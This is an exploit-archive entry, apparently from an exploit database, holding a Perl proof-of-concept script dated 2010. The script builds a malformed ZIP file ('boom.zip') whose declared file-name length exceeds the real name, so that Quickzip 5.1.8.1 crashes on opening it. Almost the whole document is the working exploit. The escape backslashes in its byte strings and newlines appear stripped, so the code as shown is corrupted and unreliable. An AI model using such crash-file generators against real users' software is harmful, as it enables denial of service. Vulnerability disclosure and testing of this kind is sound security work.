[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Quickzip 5.1.8.1 Denial of Service Vulnerability
# Published : 2010-11-02
# Author : moigai
# Previous Title : Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability
# Next Title : PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference
# Exploit Title: Quickzip 5.1.8.1 Denial of Service Vulnerability
# Date: 2010/11/02
# Author: moigai
# e-mail: again.liu@gmail.com
# Version: 5.1.8.1
# Tested on: Windows XP SP3 En (VM)
# Greetz to: Yoji
my $file = "boom.zip";
my $localHeader =
"x50x4bx03x04" . #Local file header signature
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00" .
"x00x00x00x00x00x00x00x00x00x00x00x00";
my $centralDirHeader =
"x50x4bx01x02" . #central dir header signature
"x14x0bx00x00x00x00x00x00x00x00x00x00x00x00" .
"x00x00x00x00x00x00x00x00x00x00" .
"x07x00" . #file name length
"x00x00x00x00x00x00x01x00x20x00x00x00x00x00" .
"x00x00";
# The program crashes when the file name is shorter than the length specified above.
# In the case of length specified equals 0x7, the program crash when the actual length is smaller than 0x4
my $filename = "yyy";
my $endCentralDirHeader =
"x50x4bx05x06" . #end central dir header signature
"x00x00x00x00x01x00x01x00x35x00x00x00x1ex00" .
"x00x00x00x00";
my $zip = $localHeader . $centralDirHeader . $filename . $endCentralDirHeader;
print "n[+] Creating zip filen";
open(FILE, ">$file");
print FILE $zip;
close(FILE);
print "[+] File " . $file . " createdn";